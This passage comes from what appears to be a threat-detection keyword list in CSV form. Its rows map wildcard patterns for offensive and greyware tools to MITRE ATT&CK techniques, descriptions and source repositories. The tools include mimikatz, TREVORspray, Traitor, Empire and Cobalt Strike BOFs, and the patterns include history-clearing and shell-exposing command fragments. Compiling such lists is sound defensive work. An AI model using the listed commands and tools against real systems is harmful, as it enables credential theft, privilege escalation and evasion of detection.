tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor --any *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor -e *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor --exploit*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor -p *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*Transfer done (but failed to open directory).*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*tree_connect_andx_request*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*TrevorC2*,offensive_tool_keyword,trevorc2,Command and Control via Legitimate Behavior over HTTP,T1105 - T1071 - T1070,TA0011,N/A,N/A,C2,https://github.com/trustedsec/trevorc2,1,1,N/A,10,10,1100,244,2022-01-31T20:16:24Z,2017-10-27T15:59:28Z -*trevorproxy ssh*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorproxy subnet*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorsaudi/Mshikaki*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*trevorspray -*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray *--recon *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*trevorspray -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*trevorspray.cli*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.enumerators*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.looters*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.py*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.sprayers*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray/existent_users.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray/valid_logins.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-dev*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-master*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-trevorspray*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*tricks01.hwtxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*trickster0/Enyx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*tricky.lnk*,offensive_tool_keyword,tricky.lnk,VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute,T1027 - T1036 - T1218.010,TA0002 - TA0003 - TA0008,N/A,N/A,Phishing,https://github.com/xillwillx/tricky.lnk,1,1,N/A,N/A,2,105,38,2020-12-19T23:42:10Z,2016-10-26T21:25:06Z -*TROJ_ZIPBOMB.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Trojan.Linux*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.Win32.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan.WinGo*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan/Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan/Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:PowerShell*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,trojan powershell signatures,10,10,N/A,N/A,N/A,N/A -*Trojan:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win32/IceId*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win32/Trickbot*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Trojan:Win64/IceId*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*TrojanDropper:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*TrojanSpy:MSIL/JSSLoader*,signature_keyword,Antivirus Signature,antivirus signatures,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*TrojanSpy:MSIL/JSSLoader*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*truecrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*True-Demon*,offensive_tool_keyword,Github Username,github repo hosting offensive tools and exploitation frameworks,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/True-Demon,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*trufflehog git *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*truffleHog*,offensive_tool_keyword,truffleHog,Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.,T1083 - T1081 - T1213 - T1212,TA0002 - TA0003 - TA0004 - TA0007,N/A,N/A,Information Gathering,https://github.com/dxa4481/truffleHog,1,0,N/A,N/A,10,12169,1420,2023-10-03T19:08:27Z,2016-12-31T05:08:12Z -*TruffleSnout.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*truncate -s0 *bash_history'*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*--trusted-for-delegation --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*TrustedPath-UACBypass-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*trustedsec/social-engineer-toolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,1,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*trustedsec/unicorn*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*TryCatchHCF*,offensive_tool_keyword,Github Username,github repo hosting sniffing spoofing and data exfiltration tools,N/A,N/A,N/A,N/A,Data Exfiltration,https://github.com/TryCatchHCF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ts.php*vi.txt*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ts::logonpasswords*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::mstsc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::multirdp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::remote*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*ts::sessions*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*tshark *-i *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -f *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -Q*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark -r *,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tshark*.deb*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tspkg/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*ttyd -i 0.0.0.0 -p 7681 *,greyware_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*ttyd -i 0.0.0.0 -p 7682 *,greyware_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*TunnelGRE/Augustus*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*tunnels-prod-rel-tm.trafficmanager.net*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*turn_keylogger*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*TVqQAAMAAAAEAAAA*,offensive_tool_keyword,base64,start of an executable payload in base64,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*TVqQAAMAAAAEAAAA*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z 